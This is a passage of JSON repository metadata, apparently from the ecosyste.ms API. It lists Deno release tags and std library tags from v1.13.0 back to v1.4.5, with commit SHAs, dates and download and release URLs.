"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag